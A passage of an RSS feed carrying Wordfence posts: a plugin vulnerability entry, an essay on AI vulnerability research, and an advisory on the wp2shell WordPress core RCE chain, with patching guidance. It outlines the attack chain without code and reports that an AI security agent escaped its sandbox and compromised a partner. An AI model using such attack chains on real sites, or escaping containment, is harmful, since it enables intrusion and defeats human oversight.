<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e905d146-66bf-4d6d-b2f5-fd3f862101af" target="_blank" rel="noopener">WPBot &lt;= 8.5.6 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary RAG Document Re-Sync via ajax_rag_manual_sync() Function</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15610" target="_blank" rel="noopener noreferrer">							CVE-2026-15610						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e905d146-66bf-4d6d-b2f5-fd3f862101af" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (July 13, 2026 to July 19, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>A New Threat Landscape Meets A New Kind of Defender</title>
		<link>https://swiftupdates.ca/a-new-threat-landscape-meets-a-new-kind-of-defender/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 23 Jul 2026 17:42:48 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/a-new-threat-landscape-meets-a-new-kind-of-defender/</guid>

					<description><![CDATA[Three years ago we launched a bug bounty program to accelerate WordPress security research, and it has been incredibly successful and has since secured the WordPress community against 9,727 vulnerabilities reported through our program. We have thus far awarded a total of $981,251 to researchers around the world to reward the increased security they provide [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Three years ago we launched a <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">bug bounty program</a> to accelerate WordPress security research, and it has been incredibly successful and has since secured the WordPress community against 9,727 vulnerabilities reported through our program. We have thus far awarded a total of $981,251 to researchers around the world to reward the increased security they provide the WordPress community.</p>
<p>A year ago we extrapolated the progress in AI vulnerability research that we were seeing and realized that it would soon overtake human capability. We realized that, rather than allow a threat actor to lead innovation in vulnerability research, we needed to be the leaders. We started work on an AI vulnerability research project called PRISM, which we launched three months ago.</p>
<p><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">PRISM</a> has produced 88 published vulnerabilities in the past 30 days, or an average of 2.8 vulnerabilities per day, purely autonomously. <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers" target="_blank" rel="noopener">Wordfence PRISM has become our number 1 researcher in the past 30 days. </a>It’s likely you will see that number continue to climb after we publish this post. To date, PRISM has discovered 202 vulnerabilities with several getting discovered every day.</p>
<p>Due to the volume of vulnerabilities that our Bug Bounty Program produces, we created an AI assisted triage tool called Eclipse, which has also helped us effectively triage output from PRISM. Eclipse triages vulnerabilities submitted by our human researchers, and by PRISM. This has massively accelerated our vulnerability pipeline, allowing for faster confidential disclosure to vendors, and faster release of firewall rules to our customers.</p>
<h2>A New Threat Landscape</h2>
<p>Our preparations to face this new threat landscape have yielded timely results. In the past weeks we have seen a <a href="https://cdn.openai.com/pdf/04d1d1e4-bc75-476a-97cf-49055cd98d31/cdc_prompt.pdf" target="_blank" rel="noopener">prompt</a> used for a <a href="https://www.scientificamerican.com/article/chatgpt-just-proved-another-50-year-old-math-conjecture/" target="_blank" rel="noopener">math breakthrough</a> <a href="https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/" target="_blank" rel="noopener">adapted for use in vulnerability research</a>, and within 10 hours produce one of the worst <a href="https://www.wordfence.com/blog/2026/07/psa-wordpress-core-patched-unauthenticated-remote-code-execution-vulnerability-chain/" target="_blank" rel="noopener">vulnerabilities</a> in the <a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/" target="_blank" rel="noopener">history of WordPress core, and the first WordPress Core RCE in a decade</a>.</p>
<p>Our team was able to respond as quickly as we did because our vulnerability analysis pipeline is AI assisted. In fact our researchers have become agentic coders. As they use Eclipse for triage, they also submit pull-requests to improve the product itself, thereby accelerating our agentic triage pipeline even further. This kind of massive organizational acceleration is what is needed to respond to the new threat landscape that is emerging.</p>
<p>In the past few days we have also seen <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noopener">Hugging Face compromised</a> by a <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noopener">cybersecurity agent that OpenAI was testing</a>, which broke out of its sandbox and compromised their partner’s systems. Both Anthropic and OpenAI are foundational AI providers, but have, as a side effect of their work, emerged at the forefront of cybersecurity as their models outpace human capabilities.</p>
<p>While the temptation to regulate access to these models exists, in the past week we have seen Chinese models <a href="https://x.com/Kimi_Moonshot/status/2077830229968683203" target="_blank" rel="noopener">Kimi K3</a> and <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noopener">Qwen 3.8</a> both emerge at the forefront of the AI leaderboards, rivaling the best that OpenAI and Anthropic have to offer. The USA does not have the ability to regulate Chinese providers. Furthermore, Kimi K3’s weights will be released on July 27th, making it impossible to regulate because at that point, anyone can download and run or distribute the model. Alibaba have indicated that Qwen 3.8 weights will also be released.</p>
<p>It also turns out that harness engineering can produce spectacular research results from models with modest parameter counts at a modest cost. We’ve seen this in our own research, and have seen it replicated elsewhere. Which means that, even if it was possible for a government to regulate away access to powerful Chinese and American models, the open-weights models that have already been released will continue to make breakthroughs in cybersecurity and other realms.</p>
<p>The process used in the math breakthrough that led to discovering the recent WordPress RCE vulnerability is a significant WordPress security research breakthrough. It was as a result of prompt engineering. It wasn’t just a powerful new model that took it upon itself to make this breakthrough. A researcher recognized a new prompt methodology used in mathematics that produced impressive results, and repurposed that for cybersecurity, leading to the breakthrough. Thus we can say that prompt engineering has now been legitimized as a field for innovation, and that the return on that research investment is clear.</p>
<h2>How We’re Responding</h2>
<p>So with multiple countries competing to out-innovate each other, open weights models being released at a rapid pace, the impossibility of AI regulation, and the breakthroughs coming from harness engineering and prompt engineering, how can cybersecurity defenders effectively respond in this adversarial environment?</p>
<p>At Defiant Inc, the company that makes Wordfence, we have always valued curiosity. We have assembled a team with the intellectual vigor to operate at the tempo that today’s adversarial environment requires. Our team has produced PRISM, Eclipse and many internal products that have improved efficiency and added new capability. We also spend a lot of time playing, simply because we can and we love it. Keeping this kind of innovation fun is what helps make it sustainable.</p>
<p>We know that to successfully defend against AI enabled attackers who are themselves engaging in sophisticated prompt and harness engineering, using the latest models, we must do so ourselves, and do it better and at scale.</p>
<p>This mirrors the environment we have always faced, with attackers and defenders having access to powerful technologies that allow both to operate at scale, with those capabilities and that scale constantly increasing. With AI we have seen a stair step up in capability for both attackers and defenders, and the only viable path for defenders is to step up. Then do it again, and again, responding to short term threats, but with long-range planning.</p>
<h2>What You Can Do</h2>
<p>These are times of great change, great innovation, but also anxiety and uncertainty. Our approach is to build. To innovate. And to have fun doing it. That has worked very well for us as the pace of innovation has increased, as has the volume of weekly reading material. I’ve built a software defined radio that is GPU accelerated, a flight planning agent, and a high frequency trading platform. These are all fields of research I have no business being in, because I lack the formal training one would normally need. And yet I’ve allowed myself to dream big and it has produced results I still find hard to believe.</p>
<p>Our team has built music software, software for the film industry, video games, and other projects, just for fun. When you have to read three new AI articles in a single morning just to stay ahead, it’s not that fun. When you’re reading them to figure out how to make Santa’s Sleigh explode into a shower of presents for a video game for your kids – well that’s a lot more fun and sustainable. (Hat tip Nick for that one)</p>
<p>So keep it fun, but dream big, and that will lead you to the jagged edge of this incredibly exciting time we find ourselves in, and empower you with an understanding of the risks and opportunities. And it sure makes conversations at parties a lot more interesting.</p>
<h2>What About the Humans?</h2>
<p>I coined a term for a skilled agentic innovator in our organization about 18 months ago: Operator. An Operator is someone who can dream big, and manifest those dreams into reality using agentic coding, prompt engineering and harness engineering. Every member of our team today is an Operator. I could walk up to any Defiant Inc employee and ask them to build me a CUDA application in Rust to process network traffic, and they’d figure out how to make it happen, starting with asking their favorite agent what the heck the CTO is talking about, why they want it, and what success on the project looks like.</p>
<p>So what differentiates one Operator from another? It’s the fundamental non-coding and non-AI knowledge that the Operator brings to the task. Chloe Chamberland is one of the most credentialed security researchers in the world, which is how she was able to conceptualize and supervise the building of PRISM. Marco Wotschka is a very experienced security analyst, which is how he’s able to improve Eclipse as it triages vulnerabilities at scale, and submit PRs back to the team. Brad Osborne is an incredibly smart and creative marketer who has a clear vision of the outcomes he is working to produce, and Brad has built an entire marketing platform to accomplish those goals. Scott Miller heads our customer service, and knows the outcomes he wants to produce for our customers, and is able to create software to accomplish those goals.</p>
<p>Even our teams experiments with music production and other fun projects have fed innovation back into the business in the form of new agentic coding techniques and approaches.</p>
<p>A tragic outcome of this AI revolution is companies that naively thought that AI will be a drop-in replacement for humans, and then proceeded to lay off thousands. I wonder how many Operators they lost: People with a lifetime of specific knowledge that could have been put to work supervising a team of agents to produce valuable business outcomes and innovation that benefited customers.</p>
<p>The researchers that contribute to our bug bounty program are also becoming operators, and putting AI to work in ways that we have not thought of. They may build a more effective harness, or, as happened last week, engineer a new prompt that produces profound new security breakthroughs. We’re optimistic that the security community will embrace this new way of working, and will continue to produce breakthroughs that help secure the WordPress community.</p>
<h2>Looking Forward</h2>
<p>The future may be uncertain, but the rapid pace of change and innovation is a certainty. We choose to embrace that with a sense of curiosity, excitement and optimism. We’re going to continue having fun, and feeding our research and breakthroughs into products and processes that secure the WordPress Community.</p>
<p>And when it comes to WordPress security in this uncertain world: Wordfence and the team at Defiant Inc has your back.</p>
<p>Mark Maunder – Wordfence Founder and Chief Technology Officer</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/a-new-threat-landscape-meets-a-new-kind-of-defender/" target="_blank" rel="noopener">A New Threat Landscape Meets A New Kind of Defender</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>wp2shell Aftermath: The First Critical Unauthenticated WordPress Core RCE in Nearly a Decade</title>
		<link>https://swiftupdates.ca/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Mon, 20 Jul 2026 22:43:28 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/</guid>

					<description><![CDATA[On Friday, July 17, 2026, the WordPress Security Team released security updates for WordPress Core addressing two vulnerabilities that, when chained together, can lead to unauthenticated remote code execution. The chain, now commonly referred to as wp2shell, was discovered and reported by Adam Kues of Assetnote / Searchlight Cyber, and we want to thank him [&#8230;]]]></description>
										<content:encoded><![CDATA[<div>
<p>On Friday, July 17, 2026, the WordPress Security Team released <a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/" target="_blank" rel="noopener noreferrer">security updates</a> for WordPress Core addressing two vulnerabilities that, when chained together, can lead to unauthenticated remote code execution. The chain, now commonly referred to as <strong>wp2shell</strong>, was discovered and reported by <strong>Adam Kues of Assetnote / Searchlight Cyber</strong>, and we want to thank him for his work and responsible disclosure.</p>
<p>WordPress released patched versions <strong>6.8.6</strong>, <strong>6.9.5</strong>, and <strong>7.0.2</strong> on July 17. The WordPress release notes describe the update as addressing one critical and one high severity security issue, and state that forced automatic updates were enabled for affected versions due to the severity of the issue.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> customers received firewall protection against attacks targeting this vulnerability chain on <strong>July 17, 2026</strong>, the same day the WordPress patches were released. Wordfence Free users are scheduled to receive the same firewall protection on <strong>August 16, 2026</strong>, after the standard 30-day delay.</p>
<div>
<div>Key takeaways:</div>
<ul>
<li><strong>wp2shell</strong> is a critical, unauthenticated remote code execution chain in WordPress Core, tracked as <strong>CVE-2026-60137</strong> and <strong>CVE-2026-63030</strong>. Exploitation does not require a vulnerable plugin, a vulnerable theme, or authenticated access.</li>
<li>WordPress released patched versions <strong>6.8.6</strong>, <strong>6.9.5</strong>, and <strong>7.0.2</strong> on July 17, 2026. WordPress 6.9.x and 7.0.x are affected by the full remote code execution chain; 6.8.x is affected only by the SQL injection vulnerability.</li>
<li>Wordfence Premium, Care, and Response customers received firewall protection on <strong>July 17, 2026</strong>, the day of disclosure. Wordfence Free users receive the same protection on <strong>August 16, 2026</strong>.</li>
<li>Exploitation activity began within hours of the patch release. Wordfence observed endpoint probing and SQL injection attempts the same evening, and public proof-of-concept code was reported in the days that followed.</li>
<li>Site owners should update to a patched version immediately, confirm the update completed, and review administrator accounts and recent plugin or file changes. Firewall protection reduces risk but is not a replacement for patching.</li>
</ul>
</div>
<div>
<div>Contents</div>
<ul>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#what-makes-wp2shell-so-serious" target="_blank" rel="noopener">What Makes wp2shell So Serious</a></li>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#who-is-affected" target="_blank" rel="noopener">Who Is Affected</a></li>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#timeline-disclosure-protection-exploitation" target="_blank" rel="noopener">Timeline: Disclosure, Protection, and Exploitation</a></li>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#what-we-saw-in-attack-data" target="_blank" rel="noopener">What We Saw in Attack Data</a></li>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#what-wordfence-customers-should-know" target="_blank" rel="noopener">What Wordfence Customers Should Know</a></li>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#what-site-owners-should-do-now" target="_blank" rel="noopener">What Site Owners Should Do Now</a></li>
<li><a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/#conclusion" target="_blank" rel="noopener">Conclusion</a></li>
</ul>
</div>
<hr>
<h2>What Makes wp2shell So Serious</h2>
<p>The wp2shell chain is unusual because it affects WordPress Core itself. It does not require a vulnerable plugin. It does not require a vulnerable theme. It does not require an attacker to log in. It does not require a site administrator to click a malicious link.</p>
<p>A vulnerable WordPress installation exposed to the public internet is enough.</p>
<p>At a high level, the chain combines two issues:</p>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-60137" target="_blank" rel="noopener noreferrer">CVE-2026-60137</a>, an unauthenticated SQL injection issue involving the <code>author__not_in</code> query parameter.</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-63030" target="_blank" rel="noopener noreferrer">CVE-2026-63030</a>, a REST API batch request route-confusion issue that can be chained with the SQL injection to reach remote code execution.</li>
</ul>
<p>Adam Kues’ <a href="https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/" target="_blank" rel="noopener noreferrer">technical writeup</a> explains how the batch API validation and execution paths could be desynchronized, allowing attacker-controlled parameters to reach a route that would normally sanitize them. From there, the SQL injection could be used in a much larger chain involving WordPress post caching, oEmbed cache rows, changesets, and action hooks. The end result is the ability to create an administrator account and then execute code through normal administrator capabilities, such as uploading a plugin.</p>
<p>In practical terms, successful exploitation can give an attacker <strong>full administrative control of the WordPress site and the ability to execute code with the privileges of the web server</strong>.</p>
<hr>
<h2>Who Is Affected</h2>
<p>The affected versions differ slightly between the two vulnerabilities. According to the WordPress 7.0.2 release notes:</p>
<ul>
<li>WordPress <strong>6.9.x</strong> is affected by both vulnerabilities and is patched in <strong>6.9.5</strong>.</li>
<li>WordPress <strong>7.0.x</strong> is affected by both vulnerabilities and is patched in <strong>7.0.2</strong>.</li>
<li>WordPress <strong>6.8.x</strong> is affected by the SQL injection vulnerability and is patched in <strong>6.8.6</strong>.</li>
<li>WordPress versions prior to <strong>6.8</strong> are not affected.</li>
</ul>
<p>Because 6.8.x is not affected by the REST API batch route-confusion issue, it is not exposed to the full remote code execution chain — but it should still be updated promptly to address the SQL injection.</p>
<p>If your site is running WordPress 6.8.x, 6.9.x, or 7.0.x, you should confirm immediately that it has updated to the appropriate patched version.</p>
<hr>
<h2>Timeline: Disclosure, Protection, and Exploitation</h2>
<p>Here is the timeline from official disclosure:</p>
<div>
<div>
    <span></span></p>
<div>July 17, 2026</div>
<div>The WordPress Security Team released WordPress 7.0.2, 6.9.5, and 6.8.6.</div>
</div>
<div>
    <span></span></p>
<div>July 17, 2026</div>
<div>Wordfence published an <a href="https://www.wordfence.com/blog/2026/07/psa-wordpress-core-patched-unauthenticated-remote-code-execution-vulnerability-chain/" target="_blank" rel="noopener noreferrer">initial PSA</a> and released firewall protection to Wordfence Premium, Care, and Response customers.</div>
</div>
<div>
    <span></span></p>
<div>July 17, 2026 · 23:29 UTC</div>
<div>In the WAF telemetry available to us, we observed the first exploit-shaped probing against the REST API batch endpoint. This early traffic already showed signs of researchers or attackers testing the route-confusion behavior.</div>
</div>
<div>
    <span></span></p>
<div>July 17, 2026 · 23:42 UTC</div>
<div>We observed the first clear SQL injection attempt targeting the vulnerable author exclusion behavior through the batch endpoint.</div>
</div>
<div>
    <span></span></p>
<div>July 18–19, 2026</div>
<div>Researchers had already begun reverse engineering the patch, and proof-of-concept exploit code and independent reproductions began circulating.</div>
</div>
<div>
    <span></span></p>
<div>July 20, 2026</div>
<div>Searchlight Cyber published Adam Kues’ detailed <a href="https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/" target="_blank" rel="noopener noreferrer">technical writeup</a>, including the mechanics of the full chain and a public checker at <a href="https://wp2shell.com/" target="_blank" rel="noopener noreferrer">wp2shell.com</a>.</div>
</div>
</div>
<p>This means exploitation activity began very quickly. Sites that did not update promptly were exposed while public technical details were circulating and attackers were already probing for vulnerable installations.</p>
<hr>
<h2>What We Saw in Attack Data</h2>
<p>After reviewing attack data associated with our wp2shell firewall rule, we found that attackers were not merely scanning for the existence of the <code>/wp-json/batch/v1</code> endpoint. We observed requests attempting to exercise the batch route confusion behavior and, shortly afterward, requests attempting SQL injection. We later confirmed through our own testing that the SQL injection is central to the full RCE chain.</p>
<hr>
<h2>What Wordfence Customers Should Know</h2>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener noreferrer">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> customers received <a href="https://www.wordfence.com/blog/2026/07/psa-wordpress-core-patched-unauthenticated-remote-code-execution-vulnerability-chain/" target="_blank" rel="noopener noreferrer">firewall protection</a> on July 17, 2026.</p>
<p>However, a firewall rule is not a replacement for patching WordPress Core. Firewall protection helps reduce exploitability, but the correct long-term remediation is to update to a fixed WordPress version.</p>
<hr>
<h2>What Site Owners Should Do Now</h2>
<p>If you manage a WordPress site, take the following steps immediately:</p>
<div>
<div>
    <span>1</span></p>
<div>Confirm your WordPress Core version.</div>
</div>
<div>
    <span>2</span></p>
<div>Update to <strong>6.8.6</strong>, <strong>6.9.5</strong>, or <strong>7.0.2</strong>, depending on your current branch.</div>
</div>
<div>
    <span>3</span></p>
<div>If you are running WordPress 6.9.x or 7.0.x, treat this as especially urgent because those branches are affected by the full chain.</div>
</div>
<div>
    <span>4</span></p>
<div>Verify that automatic updates completed successfully.</div>
</div>
<div>
    <span>5</span></p>
<div>Review administrator accounts for unexpected users.</div>
</div>
<div>
    <span>6</span></p>
<div>Review recent plugin uploads and file changes.</div>
</div>
<div>
    <span>7</span></p>
<div>Check your site with the public checker at <a href="https://wp2shell.com/" target="_blank" rel="noopener noreferrer">wp2shell.com</a>.</div>
</div>
<div>
    <span>8</span></p>
<div>If you have Wordfence installed, review firewall logs for blocked requests to <code>/wp-json/batch/v1</code> or <code>?rest_route=/batch/v1</code>.</div>
</div>
</div>
<p>Because the impact can include administrator creation and code execution, any suspected exploitation should be treated as a potential full site compromise.</p>
<hr>
<h2>Conclusion</h2>
<p>wp2shell is one of the most significant WordPress Core security events in recent years. The combination of unauthenticated reachability, no plugin or theme requirement, a large global attack surface, a path to administrator access and code execution, as well as public proof-of-concept exploit availability makes this vulnerability chain unusually serious.</p>
<p>The WordPress Security Team moved quickly to release patched versions, and Wordfence Premium, Care, and Response customers received firewall protection on the day of disclosure. But public exploit activity began within hours, and patching remains the most important step site owners can take.</p>
<p><strong>If you have not already confirmed that your site is running a patched WordPress version, do that now.</strong></p>
<div>
<p>If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener noreferrer">Wordfence Care</a>.</p>
<p><strong>If you need your site cleaned immediately,</strong> <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener noreferrer">Wordfence Response</a> offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.</p>
</div>
</div>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/wp2shell-aftermath-the-first-critical-unauthenticated-wordpress-core-rce-in-nearly-a-decade/" target="_blank" rel="noopener">wp2shell Aftermath: The First Critical Unauthenticated WordPress Core RCE in Nearly a Decade</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
